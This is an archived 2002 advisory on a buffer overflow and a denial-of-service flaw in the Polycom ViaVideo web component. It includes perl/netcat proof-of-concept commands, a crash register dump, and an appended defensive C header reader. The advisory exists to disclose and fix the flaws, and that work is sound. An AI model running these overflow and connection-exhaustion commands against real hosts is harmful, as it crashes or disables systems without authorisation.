Polycom ViaVideo Web Component DoS and Remote Overflow



15th Oct 2002 [SBWID-5751]
COMMAND

	Polycom ViaVideo Web component DoS and remote overflow

SYSTEMS AFFECTED

	Polycom ViaVideo 2.2
	Polycom ViaVideo 3.0

PROBLEM

	In prophecy [advisory @ prophecy.net.nz] advisory:
	

	 Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component

	 -------------------------------------------------------------------

	

	 Proof of Concept

	 ----------------

	

	perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603

	

	Error message on host:
	

	OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195

	Version: Release 3.0  26Feb2002 3.0.0.144

	ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at 001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)

	EAX=41414141  EBX=03D491C4  ECX=03D49190  EDX=00000001  ESI=03D49190

	EDI=03D4A1E8  EBP=03B6D3F4  ESP=0586FF1C  EIP=67302ECE  FLG=00010202

	CS=001B   DS=0023  SS=0023  ES=0023   FS=0038  GS=0000

	001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)

	

	

	

	 Problem #2: Denial-of-Service Vulnerability

	 -------------------------------------------

	

	 Proof of Concept

	 ----------------

	

	 - Open up several (4) connections to the webserver port (3603).

	 - Send any incomplete HTTP request.

	 - Leave these connections open at this point.

	 - Normal requests to the webserver will now fail.

	 - CPU utilisation on remote host (Win2k) goes to 99% for ViaVideo.exe

	

	[jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[5] 2140

	[jonny@loki 15:22:14 ~]$ 

	[jonny@loki 15:22:14 ~]$ jobs

	[1]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[2]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[3]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[4]-  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[5]+  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[jonny@loki 15:22:39 ~]$ 

	

SOLUTION

	A patch has been supplied by Polycom and can be downloaded at:
	

	 http://www.polycom.com/securitycenter
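
Added example, not part of the original advisory and not Polycom's code: an HTTP header reader in C that addresses both problems above by capping the header at a fixed size and by applying one overall deadline to the read. HDR_MAX, the status codes, read_header() and demo() are names assumed for this illustration, and POSIX poll() with a pipe stands in for the product's Windows socket.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <poll.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

#define HDR_MAX 4096  /* assumed cap on request line plus headers */
enum { HDR_OK = 0, HDR_TOO_LONG = -1, HDR_TIMEOUT = -2, HDR_CLOSED = -3 };

static long now_ms(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return ts.tv_sec * 1000L + ts.tv_nsec / 1000000L;
}

/* Read until "\r\n\r\n". Never writes past buf[cap-1]; gives up once
 * deadline_ms has elapsed in total, however slowly bytes trickle in. */
int read_header(int fd, char *buf, size_t cap, int deadline_ms, size_t *len) {
    long end = now_ms() + deadline_ms;
    size_t used = 0;
    while (used + 1 < cap) {                     /* keep one byte for NUL */
        long left = end - now_ms();
        if (left <= 0) return HDR_TIMEOUT;
        struct pollfd p = { .fd = fd, .events = POLLIN };
        int r = poll(&p, 1, (int)left);          /* sleeps, no busy loop */
        if (r == 0) return HDR_TIMEOUT;
        if (r < 0) { if (errno == EINTR) continue; return HDR_CLOSED; }
        ssize_t n = read(fd, buf + used, cap - 1 - used);
        if (n < 0 && errno == EINTR) continue;
        if (n <= 0) return HDR_CLOSED;           /* error or peer closed */
        used += (size_t)n;
        buf[used] = '\0';
        if (strstr(buf, "\r\n\r\n")) { *len = used; return HDR_OK; }
    }
    return HDR_TOO_LONG;                         /* reject, do not grow */
}

/* Constructed demo: a pipe stands in for the socket; writer stays open. */
int demo(const char *data, size_t n, int deadline_ms) {
    int p[2]; char buf[HDR_MAX]; size_t len = 0;
    if (pipe(p) != 0 || write(p[1], data, n) != (ssize_t)n) return -100;
    int st = read_header(p[0], buf, sizeof buf, deadline_ms, &len);
    close(p[0]); close(p[1]);
    return st;
}
int main(void) {   /* constructed input: an incomplete request */
    return demo("GET / HTTP/1.1\r\n", 16, 200) == HDR_TIMEOUT ? 0 : 1;
}
```

A server built this way closes the connection on any status other than HDR_OK, which releases the slot that a stalled or over-long request would otherwise hold.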

	

